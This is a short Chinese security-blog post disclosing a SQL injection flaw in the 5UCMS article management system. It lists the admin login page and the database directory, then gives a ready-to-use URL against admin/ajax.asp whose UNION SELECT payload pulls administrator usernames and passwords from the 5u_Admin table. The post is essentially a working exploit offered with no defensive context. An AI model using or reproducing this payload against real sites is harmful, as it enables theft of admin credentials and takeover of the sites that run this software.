无忧无忧网络文章管理系统（5UCMS）注入漏洞

2012-05-10
安全
暂无评论
1.98K次阅读

后台地址：admin/Login.asp

数据库路径：inc/db 目录下

漏洞地址：

admin/ajax.asp?Act=modeext&cid=1%20and%201=2%20UNION%20select%20111%26Chr(13)%26Chr(10)%26username%26chr(58)%261%26Chr(13)%26Chr(10)%26password%26chr(58)%20from 5u_Admin&id=1%20and%201=2%20UNION%20select%201%20from 5u_Admin

获取后台账号和密码

转载请注明来自WebShell'S Blog，本文地址：https://www.webshell.cc/3592.html

添加新评论

上一篇: Discuz NT 多个版本文件上传漏洞
下一篇: php-cgi漏洞利用EXP